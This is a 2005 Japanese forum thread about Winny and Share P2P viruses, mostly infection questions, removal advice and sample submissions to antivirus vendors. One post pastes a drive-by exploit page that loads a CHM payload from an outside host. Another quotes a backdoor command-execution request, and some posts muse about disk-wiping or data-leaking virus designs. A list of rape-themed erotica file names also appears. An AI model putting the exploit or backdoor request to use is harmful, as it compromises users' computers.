455[名無し]さん(bin+cue).rar:2005/05/21(土) 22:58:04 ID:XYrubhDa0
本体及びプラグイン作者の偽者・ウイルス・ゴミ等に対応(山田とか一部捏造警告)
http://moejump.s6.x-beat.com/filter.html

456[名無し]さん(bin+cue).rar:2005/05/21(土) 23:25:02 ID:sV41TR+w0
そういや大分前に漏れた原子力関連のスクリーンショットはどう
なったんだろう。よく考えたらあれも洒落になってないと思うが。
457[名無し]さん(bin+cue).rar:2005/05/21(土) 23:49:30 ID:HlTeOrEf0
>>456
あぁ、確か苺の時だったね。俺も結構大事になるかと思ってたけど、何にも無かったね。
458[名無し]さん(bin+cue).rar:2005/05/21(土) 23:50:02 ID:phuJuuBW0
山田ウイルスに任意のコマンドを実行できるバックドアが発見されますた。
超危険。
459[名無し]さん(bin+cue).rar:2005/05/21(土) 23:55:37 ID:qTYD9Ttx0
>>458
恐ろし〜〜〜〜((((;゚Д゚)))ガクガクブルブル
460これか:2005/05/22(日) 00:05:07 ID:oeXC5YEd0
>>458

157 :[名無し]さん(bin+cue).rar :2005/05/21(土) 23:26:14 ID:VNuCKg6W0
>>136
自鯖に山田砲撃ってログみてみた。(googleを開くように指示)
山田ウイルスにコマンド実行機能があるみたいだね。
GET /~cmd=\"explorer.exe%20\"http://www.google.co.jp/\"\" HTTP/1.0
461ひみつの文字列さん:2024/12/25(水) 21:42:58 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
462[名無し]さん(bin+cue).rar:2005/05/22(日) 01:59:14 ID:NeIXbM9L0
さて、大打撃をうけるのはいつか・・
463[名無し]さん(bin+cue).rar:2005/05/22(日) 02:18:42 ID:oeXC5YEd0
>>461
236 名前:名無しさん@5周年:2005/05/22(日) 02:02:30 ID:ujj67Jxu
業務文書フォルダのみ(解凍後)
ファイルの総数:
1051 個のファイル 43,447,237 バイト
134 個のディレクトリ

ファイル名は、個人名ビシバシなんでリストはむりぽ(´・ω・)
代わりに...

(アプリ)官能小説詰め合せ(89本)フォルダ(一部抜粋)
レイプ 恥辱のOL.txt
兄と妹・犯された蜜獣.txt
凌辱の美少女.txt
制服の秘蜜.txt
剥かれる_1.TXT
四十八手.txt
女子アナウンサー・凌辱の乳房.txt
女子高生学級連鎖・濡れたビデオ.txt
奴隷女教師・麗奈.txt
妹・禁姦.txt
姉と弟_禁蜜の薫り.txt
幼なじみ.txt
恥虐姉妹・レイプ&レイプ.txt
教育実習生・レイプ肉地獄.txt
新妻地獄.txt
生贄妻・筆下ろし奉仕.TXT
生贄美少女・恥悦教育.TXT
美少女愛玩.txt
養女.txt
464[名無し]さん(bin+cue).rar:2005/05/22(日) 02:32:31 ID:FPALUuwg0
これはいいご趣味ですね
465[名無し]さん(bin+cue).rar:2005/05/22(日) 02:39:33 ID:uFxSvdpA0
>>463
スレ違いだからそろそろ消えろ
466[名無し]さん(bin+cue).rar:2005/05/22(日) 03:21:40 ID:ZO9GtjZW0
ノートンで削除されたAntinny入りのzipは展開しても大丈夫ですか?
ウィルススキャンでも脅威は見つかりませんでしたが、他に気をつけることはありますか?
467[名無し]さん(bin+cue).rar:2005/05/22(日) 03:31:34 ID:FPALUuwg0
>>466
スキャンしたからといっても新種とか亜種には対応してませんので
ご注意を もし新種や亜種を発見した場合は、各ベンダーに対して
検体の提出や通報屋氏にご一報ください

○○.jpg                            .exeなど
そして踏んでから後悔するより、テンプレにあるツールなどを参考にどうぞ
468ひみつの文字列さん:2024/12/25(水) 21:42:58 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
469[名無し]さん(bin+cue).rar:2005/05/22(日) 06:00:42 ID:1QSx3qoq0
そうそう、PCには自然治癒能力あるから
起きた頃には元気になってるよ
470[名無し]さん(bin+cue).rar:2005/05/22(日) 08:36:59 ID:AF7DgQd20 BE:44115438-#
|-`).。oO(コミックは専用ビューアー使うからexeを踏むこと自体が珍しいと思うんだが・・・)
471[名無し]さん(bin+cue).rar:2005/05/22(日) 09:19:01 ID:R7id7upg0
>>470
>>専用ビューアー

くわしく
472[名無し]さん(bin+cue).rar:2005/05/22(日) 09:28:22 ID:qB9Mtgel0
473[名無し]さん(bin+cue).rar:2005/05/22(日) 10:04:14 ID:eu2CRee60
それぐらいぐぐれよ・・・
474[名無し]さん(bin+cue).rar:2005/05/22(日) 10:36:24 ID:1gnU5MXw0
オハヨー
Yahooにも取り上げられて大変な騒ぎですな。

てか、「任意のコマンド実行」の山田検体は収拾できましたか?
475[名無し]さん(bin+cue).rar:2005/05/22(日) 11:38:13 ID:ZO9GtjZW0
>>470
その原理すらわかってなかった。
展開すればかってにexeが実行されるのかと思ってた。
ファイルが壊れたように見せかけてexeを実行するとか、
あれはガセネタか?
476[名無し]さん(bin+cue).rar:2005/05/22(日) 12:39:37 ID:txQETUNM0
・・・・w
477[名無し]さん(bin+cue).rar:2005/05/22(日) 13:47:42 ID:pbg0IVKf0
   __
 /.Φ. \__
 |. Ξ        |
 |. Ξ        |
 |. Ξ        |                           .exe
.  ̄ ̄ ̄ ̄ ̄ ̄
478トラックバック ★:2005/05/22(日) 13:58:51 ID:sQRNx0vL0
【トラックバック来たよ】 (ver. 0.11)
[タイトル] 新しいフォルダ(2)   .exe
[発ブログ] ネットワークセキュリティ@2ch掲示板
http://pc8.2ch.net/test/read.cgi/sec/1112003988/l50
[=要約=]
気をつけようね

479[名無し]さん(bin+cue).rar:2005/05/22(日) 14:14:31 ID:3+m0CpTi0
     ,-‐、 _
      |__,,ニ=T
    ‖   ‖
     |__,、-‐''″
   (一般コミック・雑
   誌)[ジャンプ] [2005
   -23] BLEACH 177






     .exe
480[名無し]さん(bin+cue).rar:2005/05/22(日) 17:31:06 ID:xkRMT3T90
eTrustしか対応してないんじゃ意味ないな

http://jbbs.livedoor.jp/shop/832/
481[名無し]さん(bin+cue).rar:2005/05/22(日) 17:35:53 ID:1yD8O9Q70
<script language="JavaScript">
var lang = navigator.systemLanguage;
if (lang == "ru") document.location = "http://awmcash.biz/adverts/nafig.html";
if (lang == "cn") document.location = "http://awmcash.biz/adverts/nafig.html";
if (lang == "zh") document.location = "http://awmcash.biz/adverts/nafig.html";
</script>
<html>
<head>
<title></title>
</head>
<body>
<applet CODE="BlackBox.class" width=1 height=1></APPLET>
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/x-scriptlet"></object>
</body>
</html>
482ひみつの検疫さん:2024/12/25(水) 21:42:58 ID:MarkedRes
汚染を除去しました。
483[名無し]さん(bin+cue).rar:2005/05/22(日) 17:50:56 ID:eu2CRee60
定期おつー
484[名無し]さん(bin+cue).rar:2005/05/22(日) 21:52:14 ID:H1uuMXYv0
ラブレター貼るんじゃね〜YO!
一瞬ドキッテしたじゃねーか!
485[名無し]さん(bin+cue).rar:2005/05/22(日) 23:42:49 ID:Whaqt/x40
ドキッチ
486[名無し]さん(bin+cue).rar:2005/05/22(日) 23:53:41 ID:YeZP84SJ0
LoveレターはNGワード
487[名無し]さん(bin+cue).rar:2005/05/22(日) 23:59:38 ID:NeIXbM9L0
>>485
乳首すけてる
488ひみつの文字列さん:2024/12/25(水) 21:42:58 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
489[名無し]さん(bin+cue).rar:2005/05/23(月) 02:26:12 ID:DozG+vtL0
http://tmp5.2ch.net/test/read.cgi/download/1113406365/592

そういえば、対応が急に遅くなった会社がありましたね。
気のせいだと思いますけど。
490通報屋 ◆Y39/vakKjY :2005/05/23(月) 03:27:59 ID:bAN90rqZ0
>>489
検体送りすぎた。
12ファイルは流石にやりすぎだったorz
491[名無し]さん(bin+cue).rar:2005/05/23(月) 03:45:51 ID:p4KHY1HS0
>>490
キミの行動にそこまで影響力があるのか疑問だ
自意識過剰じゃないのか?
492[名無し]さん(bin+cue).rar:2005/05/23(月) 04:36:50 ID:n30iSqG00
>>491
随分偉いんだねえ。
それともあれか、キミはこの間の検体送付断られた派遣プか何かかね
493[名無し]さん(bin+cue).rar:2005/05/23(月) 05:02:07 ID:GrxbnFhv0
>491
別に速攻ID変えてフォローしに来ないでも。
494[名無し]さん(bin+cue).rar:2005/05/23(月) 05:13:23 ID:n30iSqG00
>>493
('A`)?
他のスレにはこのIDで散々書いてるんだが
それともあれか
ID代えるなんつー洒落た事を考え付くのはキミが491だからかね プ
495[名無し]さん(bin+cue).rar:2005/05/23(月) 10:52:54 ID:VoPxHsh+0
風俗店で口喧嘩なんかすんなよ
496[名無し]さん(bin+cue).rar:2005/05/23(月) 11:36:48 ID:2ocJVVT70
490 名前:通報屋 ◆Y39/vakKjY [sage] 投稿日:2005/05/23(月) 03:27:59 ID:bAN90rqZ0
>>489
検体送りすぎた。
12ファイルは流石にやりすぎだったorz

492 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:2005/05/23(月) 04:36:50 ID:n30iSqG00
>>491
随分偉いんだねえ。
それともあれか、キミはこの間の検体送付断られた派遣プか何かかね

494 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:2005/05/23(月) 05:13:23 ID:n30iSqG00
>>493
('A`)?
他のスレにはこのIDで散々書いてるんだが
それともあれか
ID代えるなんつー洒落た事を考え付くのはキミが491だからかね プ
497[名無し]さん(bin+cue).rar:2005/05/23(月) 11:53:02 ID:+y6L6jea0
ウイルス作者降臨?

通報屋に噛みつく暇があったら早く苺の新作を作ってくれ
軽量版な
後ここじゃなく一般掲示板に投げるような
498[名無し]さん(bin+cue).rar:2005/05/23(月) 11:57:48 ID:2ocJVVT70
490 名前:通報屋 ◆Y39/vakKjY [sage] 投稿日:2005/05/23(月) 03:27:59 ID:bAN90rqZ0
>>489
検体送りすぎた。
12ファイルは流石にやりすぎだったorz

492 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:2005/05/23(月) 04:36:50 ID:n30iSqG00
>>491
随分偉いんだねえ。
それともあれか、キミはこの間の検体送付断られた派遣プか何かかね

494 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:2005/05/23(月) 05:13:23 ID:n30iSqG00
>>493
('A`)?
他のスレにはこのIDで散々書いてるんだが
それともあれか
ID代えるなんつー洒落た事を考え付くのはキミが491だからかね プ

497 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:2005/05/23(月) 11:53:02 ID:+y6L6jea0
ウイルス作者降臨?

通報屋に噛みつく暇があったら早く苺の新作を作ってくれ
軽量版な
後ここじゃなく一般掲示板に投げるような
499[名無し]さん(bin+cue).rar:2005/05/23(月) 11:59:06 ID:c7JHYoa80
通報屋がシコシコ検体送らなきゃ誰も送らないだろうに
500[名無し]さん(bin+cue).rar:2005/05/23(月) 13:44:14 ID:KG01phrU0
Autorun含んだファイルにやられた orz
この際OS再インスコするか・・・
501[名無し]さん(bin+cue).rar:2005/05/23(月) 13:50:52 ID:DLjuKT110
>>500
インスコしたらレジストリ触ってAutoRun切っておけよ。
502[名無し]さん(bin+cue).rar:2005/05/23(月) 13:58:58 ID:UXhI+MBw0
>通報屋がシコシコ検体送らなきゃ誰も送らないだろうに
俺は送ってるぞ。eTrustに。
503[名無し]さん(bin+cue).rar:2005/05/23(月) 14:58:16 ID:QTL0U4MP0
激しくミニマムな悪寒
504[名無し]さん(bin+cue).rar:2005/05/23(月) 16:09:56 ID:+y6L6jea0
うはw
俺も自作自演の仲間にされてるwww
505[名無し]さん(bin+cue).rar:2005/05/23(月) 21:07:02 ID:XM3NTxUK0
HDD初期化ウィルスマダァ-? (・∀・ )っ/凵⌒☆チンチン
506[名無し]さん(bin+cue).rar:2005/05/23(月) 21:17:05 ID:QTL0U4MP0
(´-`).。oO(・・・HDDアボソはニュイルスじゃないと何度言えば)
507[名無し]さん(bin+cue).rar:2005/05/23(月) 21:38:44 ID:yLHoEnJm0
誰か気づかれずにひたすらnyとshareのキャッシュをうpしまくるウイルス作ってくれないかなー
508[名無し]さん(bin+cue).rar:2005/05/23(月) 21:52:34 ID:W3Xrorf50
それは普通に迷惑なニュイルスではないか?w
本人よりもうpられる側がw
それは真だとは限らないんだぞ?w
509[名無し]さん(bin+cue).rar:2005/05/23(月) 23:12:59 ID:18NgoupK0
スラッシュドット ジャパン | そうま農協職員、Winnyで個人情報流出か?
http://slashdot.jp/articles/05/05/23/0956236.shtml?topic=92
510[名無し]さん(bin+cue).rar:2005/05/23(月) 23:15:43 ID:HHBD25Xh0
>>505
何年も前からあるわい
511[名無し]さん(bin+cue).rar:2005/05/24(火) 00:03:22 ID:GI9JyB8s0
nyのフォルダの中にあるBbsというフォルダは症状ですか?
512[名無し]さん(bin+cue).rar:2005/05/24(火) 00:23:30 ID:1vJI+6vC0
>>506
当初はニュイルスとして機能し、HDDアボンが時限発動するようにしておけばよいのでは?
(nyの削除を検知して次の再起動時にHDDフォーマットとか)
これなら、「トロイ踏んでも即nyを削除したら平気なんですよね?」というアフォな質問も減るな
513[名無し]さん(bin+cue).rar:2005/05/24(火) 01:55:14 ID:2ZRx3q130
WORM_AGOBOT.AUVはどうやって駆除すりゃいいんでしょうか?
atapidrv.exeってファイルを作ってソレを作動させると発動みたいな感じだと思うんですが、ググッても日本語のサイトが出てきません。
514[名無し]さん(bin+cue).rar:2005/05/24(火) 02:06:42 ID:6ByGsYcl0
このスレって結構、低年齢な奴多い?
見ててさ、かなりのPCの知識ある奴多くてみんな成人以上に見えるが
実際、えらく低そうな感じがする。中学とか。
515[名無し]さん(bin+cue).rar:2005/05/24(火) 02:18:20 ID:gog4fmyN0
禿同。特に>>514なんてそのものだよな。
516[名無し]さん(bin+cue).rar:2005/05/24(火) 02:21:37 ID:9EN7RTvs0
このスレを閲覧してる人たちって結構、低年齢層なのかな?
このスレを見ててさ、かなりの人は、PCの知識ある奴が多くて、みんな成人以上に思えるんだが
実際には、えらく年齢が低そうな感じがする。中学生とか高校生だと思います。
517[名無し]さん(bin+cue).rar:2005/05/24(火) 02:46:59 ID:6ByGsYcl0
ほらな。
518[名無し]さん(bin+cue).rar:2005/05/24(火) 02:49:07 ID:QbG/BS7s0
わざわざp2使って自演乙
519[名無し]さん(bin+cue).rar:2005/05/24(火) 02:55:27 ID:9EN7RTvs0
ほらな。こんな間抜けな意味不明文章書いても、さっそく釣られるだろ?
520[名無し]さん(bin+cue).rar:2005/05/24(火) 03:47:41 ID:QbG/BS7s0
ほらな。
521[名無し]さん(bin+cue).rar:2005/05/24(火) 04:02:59 ID:snjJtRCB0
洞穴
522[名無し]さん(bin+cue).rar:2005/05/24(火) 04:14:56 ID:7S7yMGLu0
>>37
映画館は日曜日になると、人であふれていた。トイレには白い陶器の
タン壷が置かれていた。上映終了の頃には、結構タンがたまっていた。
それを、人目を避けて飲む大人がいた。
べっとりとした濃い青緑色の痰や、膿のような黄色身を帯びた痰、真紅
の鮮血が混じった痰、、、タン壷を両手で掴んで、ラッパ飲みするので
ある。ジュルジュル、ジュルジュル、ジュルジュルとすすってゴクンゴ
クンと飲むのである。新鮮な痰は、ある不治の病の妙薬であった。
523[名無し]さん(bin+cue).rar:2005/05/24(火) 06:12:42 ID:1vJI+6vC0
ネタがないとここまで落ちるものなんだなぁ…
あらかた手法は出尽くしたのかね?
524[名無し]さん(bin+cue).rar:2005/05/24(火) 10:31:57 ID:VNBsp/7X0
元也先生、MP3を作ろう!のダブルクリックがダフツレクリシクに見えるよ、元也先生
525[名無し]さん(bin+cue).rar:2005/05/24(火) 13:58:31 ID:E/O5+wMh0
Nyのポート使うやつかUPnPのやつまだー?
526[名無し]さん(bin+cue).rar:2005/05/24(火) 14:10:59 ID:jWFeyQou0
527[名無し]さん(bin+cue).rar:2005/05/24(火) 16:58:07 ID:NRI1hw620
528[名無し]さん(bin+cue).rar:2005/05/24(火) 21:16:31 ID:OgGCgfea0
ファイルを落とさない、もしくは、落としたファイルを実行しないでも
winny起動してるだけでウィルスやスパイウェアに感染するってマジですか?
529[名無し]さん(bin+cue).rar:2005/05/24(火) 21:40:53 ID:UnIJbYW80
スレ違いですが・・・


【使用OS】2000pro
【WindowsUpdateしてるか】 してる
【使用AntiVirusソフト】 ノートンインターネットセキュリティ2003
【AntiVirusをUpdateしてるか】してる
【Winnyのバージョン】Share A82
【Winny歴、総DL量】 3週間 10G位
【テンプレを読んだか】 読んだ
【テンプレにある対策を実行したか】 自分なりに実行
【症状、具体的に分かる限りすべて書く】デスクトップ上のショートカットがすべて削除された。
その他の症状は、不明・・・
【何をしたらそんなことになったのか】
(シングル)(2005.05.25) ORANGE RANGE(オレンジレンジ) - ラヴ・パレード (192kbps).zip.mp3
を解凍して出てきたフォルダ偽装EXEを開いちゃいました
【これまでにとった措置】
ウイルススキャンしたがウイルス検出されませんでした。
530[名無し]さん(bin+cue).rar:2005/05/24(火) 21:48:29 ID:g3j+zo6v0
ageるなヴォケ
531[名無し]さん(bin+cue).rar:2005/05/24(火) 21:52:36 ID:1vJI+6vC0
>>528
ポート開いてるからねぇ。相手がnyパケットに偽装して入り込んでくれば
アプリレベルのf/wだと分からんわな。ポート番号もすぐ分かるし。
それでもキャッシュにたまるだけなので、感染はしても症状発現はしないものだが。
532[名無し]さん(bin+cue).rar:2005/05/24(火) 21:53:59 ID:axl/oRmW0
>>529
ノートンの定義更新は原則的に手動じゃないと意味ないス
しかも亜種には対応していません
間違いなく感染していると思われますからhttp://blog.livedoor.jp/antiny_virus/
へ行ってチェックツールを実行しる
533[名無し]さん(bin+cue).rar:2005/05/24(火) 22:14:12 ID:mmGIKnGq0
【Winnyのバージョン】Share A82
【Winnyのバージョン】Share A82
【Winnyのバージョン】Share A82
534[名無し]さん(bin+cue).rar:2005/05/24(火) 23:01:46 ID:UnIJbYW80
529です。
スレ違いすんません。

>>532
ありがとうございます

とりあえず感染していない様子です。
535[名無し]さん(bin+cue).rar:2005/05/24(火) 23:28:34 ID:kuD/K2ER0
ポートは定期的に変えたほうがいいんだね
536[名無し]さん(bin+cue).rar:2005/05/24(火) 23:42:33 ID:6ByGsYcl0
CドライブのDocuments and Settingsに「あlf」ってフォルダがあるんだが
これってディフォであるもの?
537[名無し]さん(bin+cue).rar:2005/05/25(水) 00:01:49 ID:x5/lWB310
>>536
それはないと思うぞw
538[名無し]さん(bin+cue).rar:2005/05/25(水) 00:04:30 ID:4V2onwaY0
>537
マジ?
なんだこれ?NTUSER.DATってファイルが入ってるんだが
539[名無し]さん(bin+cue).rar:2005/05/25(水) 00:10:54 ID:5F490r/m0
あ?
そりゃあんたのログイン名と違うか?
540[名無し]さん(bin+cue).rar:2005/05/25(水) 00:14:08 ID:9r99E1TV0
このスレって結構、低年齢な奴多い?
見ててさ、かなりのPCの知識ある奴多くてみんな成人以上に見えるが
実際、えらく低そうな感じがする。中学とか。
541[名無し]さん(bin+cue).rar:2005/05/25(水) 00:21:05 ID:geJ3fXz80
>>540
引き篭もりのスーパーハカーが多いような気もする
542[名無し]さん(bin+cue).rar:2005/05/25(水) 00:37:03 ID:4V2onwaY0
>539
いやログイン名ではないです。ウイルスとかではないんですかね?
543[名無し]さん(bin+cue).rar:2005/05/25(水) 00:38:44 ID:Y3UL8HDT0
>>542
うるせえよ、ここはニュイルススレなんだよ。
ウィルススレ行って聞け。
544[名無し]さん(bin+cue).rar:2005/05/25(水) 00:54:44 ID:4V2onwaY0
>543
あーそうか。スマンね。
545[名無し]さん(bin+cue).rar:2005/05/25(水) 02:09:05 ID:DS8T6lSC0
>>540
間違ってたらごめん。もしかしてあなたは…。


546[名無し]さん(bin+cue).rar:2005/05/25(水) 03:49:26 ID:kpW1yx730
>>545
釣り禁止。
547[名無し]さん(bin+cue).rar:2005/05/25(水) 12:44:33 ID:TOkxKxqv0
またお前か。帰っていいよ。。(^o^)ノシ
548[名無し]さん(bin+cue).rar:2005/05/25(水) 16:44:27 ID:XisG1VIm0
exeの起動の可否を制御してればウイルス対策ソフトなんて必要ねぇよ。
Kerioがあれば充分でし。
549[名無し]さん(bin+cue).rar:2005/05/25(水) 16:52:40 ID:GsSwG6R10
>>548
たとえばアプリやらゲームやらが必要ならば、インストするにしても起動するだけにしろ
exeは使わにゃならん
550[名無し]さん(bin+cue).rar:2005/05/25(水) 16:53:35 ID:GsSwG6R10
もっとも、P2P系寄りニュイルスは雑誌等に何故か寄っているようだが・・
しかもフォルダに偽装て。そればっかか
551[名無し]さん(bin+cue).rar:2005/05/25(水) 17:05:34 ID:fhNtiYt90
昔は、ゲームのインストーラ画面を変更して、全然違うのを入れさせる
ってのがあったよな。
552[名無し]さん(bin+cue).rar:2005/05/25(水) 17:06:37 ID:Axzf52z00
>>548

>exeの起動の可否を制御してればウイルス対策ソフトなんて必要ねぇよ。
それもアンチウイルスの仕事なんですが・・・
553[名無し]さん(bin+cue).rar:2005/05/25(水) 17:12:38 ID:GsSwG6R10
WinRAR使うのが、まぁいろんな意味でオトクだろう
・圧縮流通がデフォで、現状流れているほぼ全ての拡張子に対応している
・アイコン偽装だろうとexeは一目瞭然
・解凍前に中身を見ることによって、解凍前にハズレ、不必要と判断できることもある

>>551
すげーな。
同じ画面を模倣してウイルスインストさせる、なら わりかし簡単に出来そうだけれども
554[名無し]さん(bin+cue).rar:2005/05/25(水) 18:14:21 ID:bQmqd28t0
>>529
shareじゃなくってnyのそのファイル名見たらantinny系が多重で入ったよ(´・ω・`)
音楽とかのライトユーザーはその手のニュースも見ないのかな
555[名無し]さん(bin+cue).rar:2005/05/25(水) 18:35:09 ID:T/YxGkCf0
>WinRAR使うのが、まぁいろんな意味でオトクだろう
( ´,_ゝ`)プッ
556[名無し]さん(bin+cue).rar:2005/05/25(水) 18:54:52 ID:GsSwG6R10
な・なんだってー
557[名無し]さん(bin+cue).rar:2005/05/25(水) 19:28:17 ID:fAz5l9RC0
"ファイルを暗号化して「人質」に--PCユーザーをねらう新手の攻撃"
http://japan.cnet.com/news/sec/story/0,2000050480,20083839,00.htm?ref=rss

その手があったか!
558[名無し]さん(bin+cue).rar:2005/05/25(水) 19:37:24 ID:TSVpGtQ70
>>557
送金口座のログ解析で、あっさり身元が割れるんでないの?
559[名無し]さん(bin+cue).rar:2005/05/25(水) 19:38:26 ID:KooNxAu90
そこで手渡しですよ
560[名無し]さん(bin+cue).rar:2005/05/25(水) 20:58:03 ID:rMhmddnX0
でもwinny使ってるってばれたら終わりだから警察いけないじゃんwww
561[名無し]さん(bin+cue).rar:2005/05/25(水) 21:06:42 ID:ec+0czF40
「新しいverのnyに接続されてます。」
という警告が時々出るのだが、これってウィルスでも流し込まれてるの?
562[名無し]さん(bin+cue).rar:2005/05/25(水) 21:12:23 ID:gVqAKGae0
>>561
既に手遅れです
563[名無し]さん(bin+cue).rar:2005/05/25(水) 21:19:29 ID:TGB72EA10
>>561
なんでも質問スレできいてこい
564[名無し]さん(bin+cue).rar:2005/05/25(水) 21:20:18 ID:NxkyG8YS0
>>561
PCを水道水でよく洗った方がいいよ。
565[名無し]さん(bin+cue).rar:2005/05/25(水) 21:21:31 ID:x5/lWB310
>>558
HDDリカバリ屋が、消去ニュイルスを流すというのは…
昔もあったよな、ワクチン屋が新種を撒くとか
566[名無し]さん(bin+cue).rar:2005/05/25(水) 21:22:18 ID:4V2onwaY0
>560
ほー、nyは使うだけでタイーフォですか。ほー。
567[名無し]さん(bin+cue).rar:2005/05/25(水) 21:28:35 ID:ec+0czF40
スマン。
質問スレのテンプレにのってた。

568[名無し]さん(bin+cue).rar:2005/05/25(水) 21:34:14 ID:+ij9k4G20
まいったなあ。127.0.0.1でマシンの中のぞけるみたいなんですけど・・・

誰か漏れのマシン覗いてる人いる?
569[名無し]さん(bin+cue).rar:2005/05/25(水) 21:34:26 ID:bQmqd28t0
>>529
バイナリをナナメにみたところ新種の山田っぽい。
書き込む板は減ってる。(´・ω・)カワイソスという表記アリ

hosts書き換え先は朝コム。
必要ならバイナリメールか暗号化付圧縮あぷろだでパスメールします>通報屋さん
570568:2005/05/25(水) 21:35:35 ID:+ij9k4G20
うわ、誤爆w

スレ違いスマソ。カワイソス
571[名無し]さん(bin+cue).rar:2005/05/25(水) 21:35:52 ID:TGB72EA10
>>568
お前のJドライブに炉利ハケーン
572[名無し]さん(bin+cue).rar:2005/05/25(水) 21:36:23 ID:6qMB9Nh/0
>>568
山田スレへ行けば歓迎してくれるよ
573[名無し]さん(bin+cue).rar:2005/05/25(水) 22:04:25 ID:bQmqd28t0
569ですが既知だった。先生はいつものBackdoor.Trojan。バスター:mellpon.L。
ただ、インストーラ(初回特典.exe)は無反応(´・ω・`)先生は反応

分離svchost.exeの対応はこんな感じ@VirusTotal

AntiVir 6.30.0.12 05.25.2005 Heuristic/Trojan.FWKiller
Avira 6.30.0.12 05.25.2005 Heuristic/Trojan.FWKiller
ClamAV devel-20050501 05.24.2005 no virus found
eTrust-Iris 7.1.194.0 05.25.2005 Win32/IIJ.143360!Trojan
Kaspersky 4.0.2.24 05.25.2005 Backdoor.Win32.Mellpon.d
McAfee 4498 05.24.2005 Uploader-X
NOD32v2 1.1107 05.24.2005 probably unknown NewHeur_PE virus
Sybari 7.5.1314 05.25.2005 Uploader-X
Symantec 8.0 05.24.2005 Backdoor.Trojan
574568:2005/05/25(水) 22:09:16 ID:+ij9k4G20
>>571
残念だけどJドライブ(´・ω・)ないス

面白がって出歯亀してたけど、漏れも全然セキュリティ初心者だから
他人ごとじゃないス

でもパス入れて見えたのがWindowsXPのマニュアル画面。全然分からん。
Skype入れたくらいしか変わったことしてないんだけどな。

これを気にもっと勉強してきます。

プライバシーの漏洩は想定の範囲(´・ω・)っス(強がり)
575[名無し]さん(bin+cue).rar:2005/05/25(水) 22:13:03 ID:5nOZAOOe0
>>574
(´・ω・)カワイソス コンドカラキヲツケルス
576[名無し]さん(bin+cue).rar:2005/05/25(水) 22:48:51 ID:lSfNf/JF0
(´・ω・)カワイソス
577[名無し]さん(bin+cue).rar:2005/05/25(水) 23:16:41 ID:NZ8Diwah0
先生かバスターのオンラインスキャンで、既知のウイルスなら発見できます?
578[名無し]さん(bin+cue).rar:2005/05/26(木) 01:28:45 ID:0pK5+Fyo0
奇知をてらった質問だが
機知に富んだウイルスなら
危地にある貴地のマシンでも
キチキチ云わずに見つかることであろう…
579[名無し]さん(bin+cue).rar:2005/05/26(木) 02:09:58 ID:iSzCds5NO
次の方どうぞ
580[名無し]さん(bin+cue).rar:2005/05/26(木) 02:53:59 ID:hIv3U8ne0
貴社の記者が汽車で帰社した
581[名無し]さん(bin+cue).rar:2005/05/26(木) 03:42:01 ID:xXKhIaI20
坊主が屏風に上手に坊主の絵を描いた
582[名無し]さん(bin+cue).rar:2005/05/26(木) 03:45:51 ID:DyjZzZcO0
キシャアアアアアアアアアアアアアーッ!!!
583[名無し]さん(bin+cue).rar:2005/05/26(木) 04:00:02 ID:kpVQg+eJ0
system32の中にsvchost.exeがあったけど削除したほうがいい?
584[名無し]さん(bin+cue).rar:2005/05/26(木) 07:10:59 ID:tbcX3iof0
消せない場合はマイコンピュータプロパティのシステムの復元をオフにして
セーフモード起動して消す。
585[名無し]さん(bin+cue).rar:2005/05/26(木) 07:24:34 ID:5d9STL+D0
>>583
間に合わなかったかさようなら。
>>584
ォィォィ
586568:2005/05/26(木) 07:36:14 ID:N1xe9tmA0
解決しますた。

結論から言うとウィルスじゃなかったっス

久しぶりにマインスイーパがやりたくなってWindowsコンポーネントの変更したときに、
酔っ払ってたせいか一緒にIISを入れてたっス。人騒がせもいいとこス・・・・orz

Skypeで話しかけてきた中国の人疑って激しくスマソ

ひとつおりこうになったス(でも元が馬鹿すぎて話にならんorz)
587[名無し]さん(bin+cue).rar:2005/05/26(木) 07:51:51 ID:FheS0NTM0
キンタマウィルスに感染しても、Port0設定にすればアップロード

されないんでしょうか? どなたか教えてください。
588[名無し]さん(bin+cue).rar:2005/05/26(木) 08:10:49 ID:xdm4NSgO0
>>587
そういう問題じゃないような気がするが。
アップロードされるとかされないを心配するより先にウィルス駆除だろうが
それともあれか。
アップロードさえされなければウィルス飼ってても構わない覚悟なのかな
589583:2005/05/26(木) 08:43:54 ID:kpVQg+eJ0
>>585
>>584の内容はまだしてないけどしちゃだめってことですか?

ウイルスバスターオンラインスキャンではなにもでてきませんでした
590[名無し]さん(bin+cue).rar:2005/05/26(木) 08:49:15 ID:0GgnK18t0
じゃあ そのままでいいんでは
591583:2005/05/26(木) 09:26:15 ID:kpVQg+eJ0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
にIMJPMlG8.1っていうのがあったんですけどこれも大丈夫ですか?
592[名無し]さん(bin+cue).rar:2005/05/26(木) 09:29:13 ID:jn+BhX150
天麩羅嫁
593[名無し]さん(bin+cue).rar:2005/05/26(木) 09:29:56 ID:dYwk5SFO0
>>591
初心者スレじゃない
594[名無し]さん(bin+cue).rar:2005/05/26(木) 13:17:21 ID:49KiJZC30

ここは超級者スレだ!(゚Д゚)

595[名無し]さん(bin+cue).rar:2005/05/26(木) 13:50:10 ID:etVVX2630
>>529
今日の早朝に拾えたのでComputerAssociates社に送りつけてみた。

Researcher comment:
Trojan.. Deletes file from C:\WINDOWS\system32 & C:\WINDOWS

eTrustは次回のシグネチャ更新で検出可能になるはず。
596[名無し]さん(bin+cue).rar:2005/05/26(木) 16:52:32 ID:OcaueFSk0
ザ バラード ラブ&ビーズ 320K がウィルスなのですが
削除できません。ノートンを使っても別のファイルがつかっています。と言う
エラーが出ます。どのようにして削除したら良いでしょうか?
マジレス希望で・
597[名無し]さん(bin+cue).rar:2005/05/26(木) 17:01:22 ID:wIL06qUF0
OS再インスコ
598[名無し]さん(bin+cue).rar:2005/05/26(木) 17:11:09 ID:ArWqXjef0
セーフモードかDOS起動で。
